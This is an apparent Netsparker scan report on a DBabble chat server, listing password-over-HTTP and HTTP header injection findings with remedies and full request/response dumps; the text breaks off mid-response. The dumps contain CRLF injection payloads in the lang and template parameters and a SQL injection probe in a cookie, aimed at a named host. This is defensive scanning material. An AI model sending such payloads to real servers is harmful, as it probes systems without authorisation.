and discussion server</a> software<table cellpadding="1" cellspacing="4"> <tr> <td class=small_font><b><a href="http://www.netwinsite.com">Netwin -- Server Software</a></b></font></td> <td class=small_font><a href="http://netwinsite.com/dnews.htm">DNews -- UseNet News Server Software</a></td> <td class=small_font><a href="http://netwinsite.com/surgemail/index.htm">SurgeMail -- Mail Server Software</a></td> </tr> <tr> <td class=small_font><a href="http://netwinsite.com/webmail/index.htm">WebMail -- Web Mail Client</a></td> <td class=small_font><a href="http://netwinsite.com/surgeftp/index.htm">SurgeFTP -- Ftp Server Software</a></td> <td class=small_font><a href="http://netwinsite.com/dbabble/index.htm">DBabble -- Chat Server, Instant Messaging, Discussions / Forums</a></td> </tr></table></font></body></html>
Password Transmitted Over HTTP

Password Transmitted Over HTTP
1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /

/ CONFIRMED

http://smtp.netwin.co.nz:8132/

Form target action

/dbabble

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: smtp.netwin.co.nz:8132
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: DBabble 2.7z
Content-Length: 14821
Connection: keep-alive
MIME-version: 1.0
Date: Fri, 22 Apr 2011 00:22:20 GMT
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html


<html><head><META HTTP-EQUIV="Pragma" CONTENT="no-cache"><META HTTP-EQUIV="cache-control" CONTENT="no-cache"><STYLE TYPE="text/css"><!-- BODY {font-size:10pt;} TD {font-size:10pt;} INPUT {font-size:9pt;} SELECT {font-size:9pt;} TEXTAREA {font-size:10pt;} TH {font-size:10pt;} FONT {font-size:10pt;} .small_font {font-size:8pt;} .big_font {font-size:12pt;}--></STYLE><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><script language="JavaScript"><!--function CheckVersion(){ document.writeln("<b>Warning - DBabble requires a web browser that Supports JavaScript 1.1 or higher.</b><br>"); document.writeln("<b>Your web browser only supports Javascript 1.0</b>");}function CheckBrowserVersion(){ ns4 = (document.layers)? true:false ns6 = (document.getElementById)? true:false ie4 = (document.all)? true:false if (!ns4 && !ie4 && !ns6) { document.writeln("<b>Warning - DBabble requires a more recent version of your web browser.</b><br>"); document.writeln("<b>For example Internet Explorer 4.0 or Netscape Navigator 4.0 or later.</b>"); }}// --></script><script language="JavaScript1.1"><!--function CheckVersion(){}// --></script><script language="JavaScript1.2"><!--function CheckVersion(){}// --></script><script language="JavaScript"><!--function FetchDate(){ x = new Date(); document.loginform.u_hour.value=x.getHours(); document.loginform.u_min.value=x.getMinutes(); document.loginform.u_sec.value=x.getSeconds(); document.loginform.u_day.value=x.getDate();}function PassOK(){ u=document.loginform.user.value; p=document.loginform.pass.value if (p=="") { txt="Guest".toLowerCase(); txt_len=txt.length; if (u.substring(0,txt_len).toLowerCase()!=txt) return 0; } return 1;}function SubmitCheck(){ u=document.loginform.user.value; if (u=="") { document.loginform.user.focus(); return false; } p=document.loginform.pass.value if (PassOK()==0) { document.loginform.pass.focus(); return false; } FetchDate(); document.loginform.qfiller.value='_'+(new Date()).getTime(); return true;}function Login2(){ FetchDate(); window.name="mainframe" document.loginform.qfiller.value='_'+(new Date()).getTime(); document.loginform.submit();}function Login() { u=document.loginform.user.value; if (u=="") return; if (PassOK()==0) return; Login2();}function KeyCode(evt){ return document.all ? event.keyCode : evt.which ? evt.which : evt.keyCode ? evt.keyCode : evt.charcode;}function PassCheck(e) { if (KeyCode(e)==13) { Login(); return false; } else return true;}function UserCheck(e) { if (KeyCode(e)==13) { if (PassOK()==0) { document.loginform.pass.focus(); return false; } Login2(); return false; } else return true;}function Startup(){ if (window.top!=window && window.location!="/dbabble") { window.location="/dbabble?cmd=top_frame_error"; } window.name="login"}function GuestLogin(){ document.loginform.user.value="Guest" document.loginform.pass.value=""; Login2();}function GuestLoginClearForm(){ document.loginform.new_window.value="" document.loginform.hide_menu_and_friends.value="" document.loginform.after_login_page.value="" document.loginform.after_logout_page.value="" document.loginform.override_dot_top.value="" document.loginform.override_main_name.value="" document.loginform.override_check_main_window.value="" document.loginform.target=""}function ClearFormSoon(){ setTimeout('GuestLoginClearForm()',2000)}function GuestLoginChatRoomInvite(gid,hide_menu_and_friends, invite_uid){ GuestLoginClearForm() if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="3" pv="cmd=chat_list&gid="+gid if (invite_uid>0) { pv=pv+"&invite_hid=511&invite_uid="+invite_uid+"&invite_is_ugroup=0"; } document.loginform.after_login_page.value=pv; GuestLogin(); ClearFormSoon()}function GuestLoginChatRoom(gid,hide_menu_and_friends){ GuestLoginChatRoomInvite(gid,hide_menu_and_friends,0);}function GuestLoginDiscussion(gid,hide_menu_and_friends){ GuestLoginClearForm() if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="2" document.loginform.after_login_page.value="cmd=group_items&gid="+gid; GuestLogin(); ClearFormSoon()}function GuestLoginNow(){ GuestLogin(); ClearFormSoon()}function GuestLoginTalkDo2(new_window,window_width, window_height, is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message, sub_frame_name, after_logout_page){ GuestLoginClearForm() txt="uid" if (is_ugroup) txt="ugid" document.loginform.after_logout_page.value=after_logout_page; if (new_window) { document.loginform.new_window.value="true" window.open("", "messageWindow", "width="+window_width+",height="+window_height+",resizable=yes") document.loginform.target="messageWindow" document.loginform.after_logout_page.value="javascript:window.close()" } if (sub_frame_name!="") { if (after_logout_page=="") { document.loginform.after_logout_page.value="blank.htm"; } document.loginform.override_dot_top.value=".top."+sub_frame_name document.loginform.override_main_name.value=sub_frame_name document.loginform.override_check_main_window.value="window.length>1 && window.top.frames[1].name=='"+sub_frame_name+"'" } if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="0" document.loginform.after_login_page.value="cmd=u_talk&hid=511&"+txt+"="+uid+"&talk_first_message="+escape(initial_message)+"&talk_other_first_message="+escape(other_initial_message)+"&talk_request_style="+talk_request_style+"&title_message="+escape(title_message)+"&leave_message="+escape(leave_message)+"&pick_first="+group_pick_first+"&heading_message="+escape(heading_message)+"&alt_message="+escape(alt_message);; document.loginform.window_title.value=title_message; setTimeout("GuestLoginNow()",250);}function GuestLoginTalkDo(new_window,is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message){ GuestLoginTalkDo2(new_window,290,190,is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message,"","")}function GuestLoginTalk(new_window, is_ugroup, uid,hide_menu_and_friends,initial_message){ other_initial_message="Hi, -NAME- here. How can I help you?" talk_request_style=1 // 0 = Send request to recipient as soon as clicking on the link // 1 = Send request as soon as you start typing // 2 = Send request as soon as you have finished typing a complete line GuestLoginTalkDo(new_window,is_ugroup,0,uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message,'','','','')}// --></script><title>DBabble login</title></head><body onload="Startup()" BACKGROUND="/img/whttxtr2.jpg"><LINK REL = "stylesheet" TYPE = "text/css" HREF = "/dbabble?cmd_get_js2=dbabble.css"><script language="JavaScript" src="/dbabble?cmd_get_js2=dbabble.js"></script><table bgcolor="black" width=100% border=0><tr> <td width=100% bgcolor="#336699" valign=center align=center><table border=0 cellpadding=0 cellspacing=0 margin=0><tr><td><img src="/img/netwin.gif" alt="Brought to you by NetWin Server Software - http://netwinsite.com" border=0</img></td><td><font class="huge_font" color="white">DBabble</font></td><td>&nbsp;&nbsp;&nbsp;</td><td><STYLE TYPE="text/css"><!-- A:VISITED.href_encode_class {color:white;} A:LINK.href_encode_class {color:white;}--></STYLE><font color="white">Brought to you by NetWin Server Software - <a class='href_encode_class' target='notvchat' href='http://netwinsite.com'>http://netwinsite.com</a></font></td></tr></table></td></tr></table><table><table width="100%" cellpadding=0 cellspacing=1 border=0 bgcolor="black"><tr align=center><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="khaki"><font color="black">Language:</font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><font color="white"><b>English</b></font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="/dbabble?lang=Espa�ol(Spanish)&template=Standard"><font color="white">Espa�ol(Spanish)</font></a><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="/dbabble?lang=Deutsch(German)&template=Standard"><font color="white">Deutsch(German)</font></a><spacer type="block" width=10px></td><td bgcolor="steelblue" width="100%">&nbsp;</td></tr></table><br></tr></table><table><tr><td><font color="orange" style="font-size:12pt;"><b>DBabble for Windows</b></font>- You should download and install the DBabble Windows 95/98/ME/2000/2003/NT/XP client rather than using this web page if possible. It is much faster and easier to use. You can download it free from here. <a href="/files/DBabble27y_English.exe" style="font-size:12pt;">Download DBabble Version 2.7y</a>(1,901,847 bytes - should take about 5 minutes over a 56K modem)</td></tr></table><script language="JavaScript"><!--CheckVersion() CheckBrowserVersion()//--></script><NOSCRIPT><b> Warning - DBabble requires a web browser that Supports JavaScript 1.1 or higher.<br>Your web browser does not support Javascript or you have disabled it in your preferences.</b></NOSCRIPT><form style="margin:0" name="loginform" method="POST" target="_top" action="/dbabble"onSubmit="return SubmitCheck()"><table width=100%><tr><th colspan=2 align=left bgcolor=ivory>Login User Name & Password</th><th colspan=2" align=left bgcolor=ivory width=100%>Login Options</th></tr><tr><td><table><tr><td nowrap> User Name</td><td><input type="text" name="user" value="" size="20" onkeypress="return UserCheck(event)"></td></tr><tr><td nowrap> Password</td><td> <input type="password" name="pass" value="" size="20" onkeypress="return PassCheck(event)"></td></tr></table></td><td align="LEFT"><input align="LEFT" type="submit" class=spbutton onmouseover="MO(event)" onmouseout="MU(event)" value="Login" alt="Login" name="Login"></td><td><table><tr><td nowrap><input type=hidden name="is_save_password" value="true"><input type=radio name="save_name" value="name">Save Name</td></tr><tr><td nowrap><input type=radio name="save_name" value="pass">Save Name and Password</td></tr><tr><td nowrap><input type=radio name="save_name" checked value="neither">Neither</td></tr></table></td><td><table><tr><td>To simplify the interface you can optionally hide some features</td></tr><tr><td>Features:<select name="show_features"><option value="0" selected>Show All Features</option><option value="1" >Instant Messages Only</option><option value="2" >Forums Only</option><option value="3" >Chat Rooms Only</option><option value="4" >Chat Rooms and Forums Only</option><option value="5" >Chat Rooms and Instant Messages Only</option><option value="6" >Forums and Instant Messages Only</option></select></td></tr></table></td></tr></table><input type="hidden" name="r_login" value="Login"><input type="hidden" name="u_day" value=""><input type="hidden" name="u_hour" value=""><input type="hidden" name="u_min" value=""><input type="hidden" name="u_sec" value=""><input type="hidden" name="qfiller" value=""><input type="hidden" name="window_title" value=""><input type="hidden" name="change_lang" value=""><input type="hidden" name="change_template" value=""><input type="hidden" name="after_login_page" value=""><input type="hidden" name="hide_menu_and_friends" value=""><input type="hidden" name="after_logout_page" value=""><input type="hidden" name="override_dot_top" value=""><input type=hidden name="override_main_name" value=""><input type=hidden name="override_check_main_window" value=""><input type=hidden name="new_window" value="0"></form><script language="JavaScript"><!--document.loginform.user.focus();// --></script>Just login using your normal Email user name and password<br><table width=100%><tr><th align=left bgcolor=ivory>Guest Login</th></tr><tr><td>Alternatively you can login as a guest. Some DBabble features are not available as a guest.</td></tr><tr><td><a href="javascript:GuestLogin()">Guest login</a></td></tr></table><table width=100%><tr><th align=left bgcolor=ivory>Other Links</th></tr></table><a target='helpwin' href="/help/English/Standard/contents.htm">DBabble Online Help</a><br><a target='helpwin' href="/help/English/Standard/password.htm">Forgot your Password?</a><br><br>On this server we have 17 registered usersand 2 users are currently online.There is 1 chat roomand there is 1 forumcontaining a total of 306 articles.<br><br>You can use DBabble securely but slower through your web browser at <a href="https://netwin.co.nz:8133">https://netwin.co.nz:8133</a><hr>DBabble Linux Server Version 2.7z (Aug 25 2004)- Server up for 340 days since Sun, May 16 2010 4:44 pm<hr><font class=small_font>Powered by Netwin's <a href="http://netwinsite.com/dbabble/index.htm">DBabble secure chat, instant messaging and discussion server</a> software<table cellpadding="1" cellspacing="4"> <tr> <td class=small_font><b><a href="http://www.netwinsite.com">Netwin -- Server Software</a></b></font></td> <td class=small_font><a href="http://netwinsite.com/dnews.htm">DNews -- UseNet News Server Software</a></td> <td class=small_font><a href="http://netwinsite.com/surgemail/index.htm">SurgeMail -- Mail Server Software</a></td> </tr> <tr> <td class=small_font><a href="http://netwinsite.com/webmail/index.htm">WebMail -- Web Mail Client</a></td> <td class=small_font><a href="http://netwinsite.com/surgeftp/index.htm">SurgeFTP -- Ftp Server Software</a></td> <td class=small_font><a href="http://netwinsite.com/dbabble/index.htm">DBabble -- Chat Server, Instant Messaging, Discussions / Forums</a></td> </tr></table></font></body></html>
HTTP Header Injection

HTTP Header Injection
2 TOTAL
MEDIUM
A CRLF (New line) injection in HTTP headers was identified. This means that the input goes into HTTP headers without proper input filtering.

Impact

Depending on the application. An attacker might carry out the following forms of attacks:

Actions to Take

  1. See the remedy for solution.
  2. Ensure the server security patches are up to date and that the current stable version of the software is in use.

Remedy

Do not allow newline characters in input. Where possible use strict white listing.

Required Skills for Successful Exploitation

Crafting the attack to exploit this issue is not a complex process. However most of the unsophisticated attackers will not know that such an attack is possible. Also an attacker needs to reach his victim by an e-mail or other similar method in order to entice them to visit the site or click upon a URL.

External References

- /dbabble

/dbabble

http://smtp.netwin.co.nz:8132/dbabble?lang=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&t..

Parameters

Parameter Type Value
lang GET http://example.com/? ns: netsparker056650=vuln
template GET Standard

Request

GET /dbabble?lang=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&template=Standard HTTP/1.1
Referer: http://smtp.netwin.co.nz:8132/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: smtp.netwin.co.nz:8132
Cookie: TEMPLATE=Standard; LANG=
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: DBabble 2.7z
Content-Length: 14876
Connection: close
Set-Cookie: LANG=http://example.com/?
ns: netsparker056650=vuln; path=/; expires=Sat, 21 Apr 2012 00:22:47 GMT
MIME-version: 1.0
Date: Fri, 22 Apr 2011 00:22:47 GMT
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html


<html><head><META HTTP-EQUIV="Pragma" CONTENT="no-cache"><META HTTP-EQUIV="cache-control" CONTENT="no-cache"><STYLE TYPE="text/css"><!-- BODY {font-size:10pt;} TD {font-size:10pt;} INPUT {font-size:9pt;} SELECT {font-size:9pt;} TEXTAREA {font-size:10pt;} TH {font-size:10pt;} FONT {font-size:10pt;} .small_font {font-size:8pt;} .big_font {font-size:12pt;}--></STYLE><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><script language="JavaScript"><!--function CheckVersion(){ document.writeln("<b>Warning - DBabble requires a web browser that Supports JavaScript 1.1 or higher.</b><br>"); document.writeln("<b>Your web browser only supports Javascript 1.0</b>");}function CheckBrowserVersion(){ ns4 = (document.layers)? true:false ns6 = (document.getElementById)? true:false ie4 = (document.all)? true:false if (!ns4 && !ie4 && !ns6) { document.writeln("<b>Warning - DBabble requires a more recent version of your web browser.</b><br>"); document.writeln("<b>For example Internet Explorer 4.0 or Netscape Navigator 4.0 or later.</b>"); }}// --></script><script language="JavaScript1.1"><!--function CheckVersion(){}// --></script><script language="JavaScript1.2"><!--function CheckVersion(){}// --></script><script language="JavaScript"><!--function FetchDate(){ x = new Date(); document.loginform.u_hour.value=x.getHours(); document.loginform.u_min.value=x.getMinutes(); document.loginform.u_sec.value=x.getSeconds(); document.loginform.u_day.value=x.getDate();}function PassOK(){ u=document.loginform.user.value; p=document.loginform.pass.value if (p=="") { txt="Guest".toLowerCase(); txt_len=txt.length; if (u.substring(0,txt_len).toLowerCase()!=txt) return 0; } return 1;}function SubmitCheck(){ u=document.loginform.user.value; if (u=="") { document.loginform.user.focus(); return false; } p=document.loginform.pass.value if (PassOK()==0) { document.loginform.pass.focus(); return false; } FetchDate(); document.loginform.qfiller.value='_'+(new Date()).getTime(); return true;}function Login2(){ FetchDate(); window.name="mainframe" document.loginform.qfiller.value='_'+(new Date()).getTime(); document.loginform.submit();}function Login() { u=document.loginform.user.value; if (u=="") return; if (PassOK()==0) return; Login2();}function KeyCode(evt){ return document.all ? event.keyCode : evt.which ? evt.which : evt.keyCode ? evt.keyCode : evt.charcode;}function PassCheck(e) { if (KeyCode(e)==13) { Login(); return false; } else return true;}function UserCheck(e) { if (KeyCode(e)==13) { if (PassOK()==0) { document.loginform.pass.focus(); return false; } Login2(); return false; } else return true;}function Startup(){ if (window.top!=window && window.location!="/dbabble") { window.location="/dbabble?cmd=top_frame_error"; } window.name="login"}function GuestLogin(){ document.loginform.user.value="Guest" document.loginform.pass.value=""; Login2();}function GuestLoginClearForm(){ document.loginform.new_window.value="" document.loginform.hide_menu_and_friends.value="" document.loginform.after_login_page.value="" document.loginform.after_logout_page.value="" document.loginform.override_dot_top.value="" document.loginform.override_main_name.value="" document.loginform.override_check_main_window.value="" document.loginform.target=""}function ClearFormSoon(){ setTimeout('GuestLoginClearForm()',2000)}function GuestLoginChatRoomInvite(gid,hide_menu_and_friends, invite_uid){ GuestLoginClearForm() if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="3" pv="cmd=chat_list&gid="+gid if (invite_uid>0) { pv=pv+"&invite_hid=511&invite_uid="+invite_uid+"&invite_is_ugroup=0"; } document.loginform.after_login_page.value=pv; GuestLogin(); ClearFormSoon()}function GuestLoginChatRoom(gid,hide_menu_and_friends){ GuestLoginChatRoomInvite(gid,hide_menu_and_friends,0);}function GuestLoginDiscussion(gid,hide_menu_and_friends){ GuestLoginClearForm() if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="2" document.loginform.after_login_page.value="cmd=group_items&gid="+gid; GuestLogin(); ClearFormSoon()}function GuestLoginNow(){ GuestLogin(); ClearFormSoon()}function GuestLoginTalkDo2(new_window,window_width, window_height, is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message, sub_frame_name, after_logout_page){ GuestLoginClearForm() txt="uid" if (is_ugroup) txt="ugid" document.loginform.after_logout_page.value=after_logout_page; if (new_window) { document.loginform.new_window.value="true" window.open("", "messageWindow", "width="+window_width+",height="+window_height+",resizable=yes") document.loginform.target="messageWindow" document.loginform.after_logout_page.value="javascript:window.close()" } if (sub_frame_name!="") { if (after_logout_page=="") { document.loginform.after_logout_page.value="blank.htm"; } document.loginform.override_dot_top.value=".top."+sub_frame_name document.loginform.override_main_name.value=sub_frame_name document.loginform.override_check_main_window.value="window.length>1 && window.top.frames[1].name=='"+sub_frame_name+"'" } if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="0" document.loginform.after_login_page.value="cmd=u_talk&hid=511&"+txt+"="+uid+"&talk_first_message="+escape(initial_message)+"&talk_other_first_message="+escape(other_initial_message)+"&talk_request_style="+talk_request_style+"&title_message="+escape(title_message)+"&leave_message="+escape(leave_message)+"&pick_first="+group_pick_first+"&heading_message="+escape(heading_message)+"&alt_message="+escape(alt_message);; document.loginform.window_title.value=title_message; setTimeout("GuestLoginNow()",250);}function GuestLoginTalkDo(new_window,is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message){ GuestLoginTalkDo2(new_window,290,190,is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message,"","")}function GuestLoginTalk(new_window, is_ugroup, uid,hide_menu_and_friends,initial_message){ other_initial_message="Hi, -NAME- here. How can I help you?" talk_request_style=1 // 0 = Send request to recipient as soon as clicking on the link // 1 = Send request as soon as you start typing // 2 = Send request as soon as you have finished typing a complete line GuestLoginTalkDo(new_window,is_ugroup,0,uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message,'','','','')}// --></script><title>DBabble login</title></head><body onload="Startup()" BACKGROUND="/img/whttxtr2.jpg"><LINK REL = "stylesheet" TYPE = "text/css" HREF = "/dbabble?cmd_get_js2=dbabble.css"><script language="JavaScript" src="/dbabble?cmd_get_js2=dbabble.js"></script><table bgcolor="black" width=100% border=0><tr> <td width=100% bgcolor="#336699" valign=center align=center><table border=0 cellpadding=0 cellspacing=0 margin=0><tr><td><img src="/img/netwin.gif" alt="Brought to you by NetWin Server Software - http://netwinsite.com" border=0</img></td><td><font class="huge_font" color="white">DBabble</font></td><td>&nbsp;&nbsp;&nbsp;</td><td><STYLE TYPE="text/css"><!-- A:VISITED.href_encode_class {color:white;} A:LINK.href_encode_class {color:white;}--></STYLE><font color="white">Brought to you by NetWin Server Software - <a class='href_encode_class' target='notvchat' href='http://netwinsite.com'>http://netwinsite.com</a></font></td></tr></table></td></tr></table><table><table width="100%" cellpadding=0 cellspacing=1 border=0 bgcolor="black"><tr align=center><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="khaki"><font color="black">Language:</font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><font color="white"><b>English</b></font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="/dbabble?lang=Espa�ol(Spanish)&template=Standard"><font color="white">Espa�ol(Spanish)</font></a><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="/dbabble?lang=Deutsch(German)&template=Standard"><font color="white">Deutsch(German)</font></a><spacer type="block" width=10px></td><td bgcolor="steelblue" width="100%">&nbsp;</td></tr></table><br></tr></table><table><tr><td><font color="orange" style="font-size:12pt;"><b>DBabble for Windows</b></font>- You should download and install the DBabble Windows 95/98/ME/2000/2003/NT/XP client rather than using this web page if possible. It is much faster and easier to use. You can download it free from here. <a href="/files/DBabble27y_English.exe" style="font-size:12pt;">Download DBabble Version 2.7y</a>(1,901,847 bytes - should take about 5 minutes over a 56K modem)</td></tr></table><script language="JavaScript"><!--CheckVersion() CheckBrowserVersion()//--></script><NOSCRIPT><b> Warning - DBabble requires a web browser that Supports JavaScript 1.1 or higher.<br>Your web browser does not support Javascript or you have disabled it in your preferences.</b></NOSCRIPT><form style="margin:0" name="loginform" method="POST" target="_top" action="/dbabble"onSubmit="return SubmitCheck()"><table width=100%><tr><th colspan=2 align=left bgcolor=ivory>Login User Name & Password</th><th colspan=2" align=left bgcolor=ivory width=100%>Login Options</th></tr><tr><td><table><tr><td nowrap> User Name</td><td><input type="text" name="user" value="" size="20" onkeypress="return UserCheck(event)"></td></tr><tr><td nowrap> Password</td><td> <input type="password" name="pass" value="" size="20" onkeypress="return PassCheck(event)"></td></tr></table></td><td align="LEFT"><input align="LEFT" type="submit" class=spbutton onmouseover="MO(event)" onmouseout="MU(event)" value="Login" alt="Login" name="Login"></td><td><table><tr><td nowrap><input type=hidden name="is_save_password" value="true"><input type=radio name="save_name" value="name">Save Name</td></tr><tr><td nowrap><input type=radio name="save_name" value="pass">Save Name and Password</td></tr><tr><td nowrap><input type=radio name="save_name" checked value="neither">Neither</td></tr></table></td><td><table><tr><td>To simplify the interface you can optionally hide some features</td></tr><tr><td>Features:<select name="show_features"><option value="0" selected>Show All Features</option><option value="1" >Instant Messages Only</option><option value="2" >Forums Only</option><option value="3" >Chat Rooms Only</option><option value="4" >Chat Rooms and Forums Only</option><option value="5" >Chat Rooms and Instant Messages Only</option><option value="6" >Forums and Instant Messages Only</option></select></td></tr></table></td></tr></table><input type="hidden" name="r_login" value="Login"><input type="hidden" name="u_day" value=""><input type="hidden" name="u_hour" value=""><input type="hidden" name="u_min" value=""><input type="hidden" name="u_sec" value=""><input type="hidden" name="qfiller" value=""><input type="hidden" name="window_title" value=""><input type="hidden" name="change_lang" value="http://example.com/?
ns: netsparker056650=vuln"><input type="hidden" name="change_template" value="Standard"><input type="hidden" name="after_login_page" value=""><input type="hidden" name="hide_menu_and_friends" value=""><input type="hidden" name="after_logout_page" value=""><input type="hidden" name="override_dot_top" value=""><input type=hidden name="override_main_name" value=""><input type=hidden name="override_check_main_window" value=""><input type=hidden name="new_window" value="0"></form><script language="JavaScript"><!--document.loginform.user.focus();// --></script>Just login using your normal Email user name and password<br><table width=100%><tr><th align=left bgcolor=ivory>Guest Login</th></tr><tr><td>Alternatively you can login as a guest. Some DBabble features are not available as a guest.</td></tr><tr><td><a href="javascript:GuestLogin()">Guest login</a></td></tr></table><table width=100%><tr><th align=left bgcolor=ivory>Other Links</th></tr></table><a target='helpwin' href="/help/English/Standard/contents.htm">DBabble Online Help</a><br><a target='helpwin' href="/help/English/Standard/password.htm">Forgot your Password?</a><br><br>On this server we have 17 registered usersand 2 users are currently online.There is 1 chat roomand there is 1 forumcontaining a total of 306 articles.<br><br>You can use DBabble securely but slower through your web browser at <a href="https://netwin.co.nz:8133">https://netwin.co.nz:8133</a><hr>DBabble Linux Server Version 2.7z (Aug 25 2004)- Server up for 340 days since Sun, May 16 2010 4:44 pm<hr><font class=small_font>Powered by Netwin's <a href="http://netwinsite.com/dbabble/index.htm">DBabble secure chat, instant messaging and discussion server</a> software<table cellpadding="1" cellspacing="4"> <tr> <td class=small_font><b><a href="http://www.netwinsite.com">Netwin -- Server Software</a></b></font></td> <td class=small_font><a href="http://netwinsite.com/dnews.htm">DNews -- UseNet News Server Software</a></td> <td class=small_font><a href="http://netwinsite.com/surgemail/index.htm">SurgeMail -- Mail Server Software</a></td> </tr> <tr> <td class=small_font><a href="http://netwinsite.com/webmail/index.htm">WebMail -- Web Mail Client</a></td> <td class=small_font><a href="http://netwinsite.com/surgeftp/index.htm">SurgeFTP -- Ftp Server Software</a></td> <td class=small_font><a href="http://netwinsite.com/dbabble/index.htm">DBabble -- Chat Server, Instant Messaging, Discussions / Forums</a></td> </tr></table></font></body></html>
- /dbabble

/dbabble

http://smtp.netwin.co.nz:8132/dbabble?lang=Espa%EF%BF%BDol(Spanish)&template=http://example.com/%3f%..

Parameters

Parameter Type Value
lang GET Espa�ol(Spanish)
template GET http://example.com/? ns: netsparker056650=vuln

Request

GET /dbabble?lang=Espa%EF%BF%BDol(Spanish)&template=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln HTTP/1.1
Referer: http://smtp.netwin.co.nz:8132/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: smtp.netwin.co.nz:8132
Cookie: TEMPLATE=; LANG=' OR 'ns'='ns
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: DBabble 2.7z
Content-Length: 15345
Connection: close
Set-Cookie: TEMPLATE=http://example.com/?,LANG=Espa�ol(Spanish); path=/; expires=Sat, 21 Apr 2012 00:22:47 GMT
ns: netsparker056650=vuln; path=/; expires=Sat, 21 Apr 2012 00:22:47 GMT
MIME-version: 1.0
Date: Fri, 22 Apr 2011 00:22:47 GMT
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html


<html><head><META HTTP-EQUIV="Pragma" CONTENT="no-cache"><META HTTP-EQUIV="cache-control" CONTENT="no-cache"><STYLE TYPE="text/css"><!-- BODY {font-size:10pt;} TD {font-size:10pt;} INPUT {font-size:9pt;} SELECT {font-size:9pt;} TEXTAREA {font-size:10pt;} TH {font-size:10pt;} FONT {font-size:10pt;} .small_font {font-size:8pt;} .big_font {font-size:12pt;}--></STYLE><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><script language="JavaScript"><!--function CheckVersion(){ document.writeln("<b>Advertencia - DBabble requiere un web browser que apoye el Javascript 1,1 o m�s alto.</b><br>"); document.writeln("<b>Your web browser only supports Javascript 1.0</b>");}function CheckBrowserVersion(){ ns4 = (document.layers)? true:false ns6 = (document.getElementById)? true:false ie4 = (document.all)? true:false if (!ns4 && !ie4 && !ns6) { document.writeln("<b>Warning - DBabble requires a more recent version of your web browser.</b><br>"); document.writeln("<b>For example Internet Explorer 4.0 or Netscape Navigator 4.0 or later.</b>"); }}// --></script><script language="JavaScript1.1"><!--function CheckVersion(){}// --></script><script language="JavaScript1.2"><!--function CheckVersion(){}// --></script><script language="JavaScript"><!--function FetchDate(){ x = new Date(); document.loginform.u_hour.value=x.getHours(); document.loginform.u_min.value=x.getMinutes(); document.loginform.u_sec.value=x.getSeconds(); document.loginform.u_day.value=x.getDate();}function PassOK(){ u=document.loginform.user.value; p=document.loginform.pass.value if (p=="") { txt="Invitado".toLowerCase(); txt_len=txt.length; if (u.substring(0,txt_len).toLowerCase()!=txt) return 0; } return 1;}function SubmitCheck(){ u=document.loginform.user.value; if (u=="") { document.loginform.user.focus(); return false; } p=document.loginform.pass.value if (PassOK()==0) { document.loginform.pass.focus(); return false; } 